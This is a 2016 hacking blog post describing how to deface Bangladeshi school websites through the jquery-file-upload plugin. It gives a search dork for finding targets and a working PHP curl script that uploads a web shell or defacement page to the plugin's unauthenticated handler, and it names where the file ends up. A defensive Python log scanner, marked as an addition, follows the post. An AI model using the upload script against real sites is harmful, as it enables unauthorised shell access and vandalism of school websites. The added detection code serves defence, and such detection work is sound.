Saturday, 30 April 2016

Defacing Bangladeshi school websites

Hello.

This time I want to share how Bangladeshi school websites get defaced.
It's much like the balitbang bug here in Indonesia.

The bug is in the jquery-file-upload plugin.
Alright, let's get straight to it.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; // shell or deface script
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
POC:

result:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)
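
From the defending side, the upload described in this post leaves two traces in a web server access log: a POST sent straight to the plugin's `server/php/` handler, and a later successful request for a non-image file under `server/php/files/`. The Python below is an added example, not part of the original post; the log lines are constructed, and the image-only allow-list is an assumption about what the site is meant to accept.

```python
import re

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [30/Apr/2016:10:01:02 +0000] "POST /assets/super_admin/vendor/jquery-file-upload/server/php/ HTTP/1.1" 200 312 "-" "-"
203.0.113.7 - - [30/Apr/2016:10:01:09 +0000] "GET /assets/super_admin/vendor/jquery-file-upload/server/php/files/kkk.htm HTTP/1.1" 200 1841 "-" "Mozilla/5.0"
198.51.100.4 - - [30/Apr/2016:10:05:00 +0000] "GET /assets/super_admin/vendor/jquery-file-upload/server/php/files/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Apr/2016:10:07:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, path, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The plugin's bundled server-side handler, wherever the plugin is installed.
HANDLER_RE = re.compile(r'/jquery-file-upload/server/php/(?:index\.php)?(?:\?.*)?$', re.I)
# Anything served back out of the handler's upload directory.
STORED_RE = re.compile(r'/jquery-file-upload/server/php/files/([^/?]+)', re.I)
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}  # assumption: site only expects images


def find_suspicious(log_text):
    """Return (ip, timestamp, reason, path) tuples worth triaging."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, path, status = m.groups()
        if method == "POST" and HANDLER_RE.search(path):
            # Legitimate admin uploads also hit this handler; correlate with
            # an authenticated session or referer before treating it as hostile.
            findings.append((ip, ts, "direct-upload-post", path))
            continue
        stored = STORED_RE.search(path)
        if stored and status.startswith("2"):
            name = stored.group(1)
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in ALLOWED_EXT:
                findings.append((ip, ts, "non-image-served", path))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A hit on `non-image-served` means the upload directory is both writable through the handler and serving arbitrary file types, which is the condition to remove: restrict accepted file types server-side and stop the web server from rendering or executing content from that directory.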
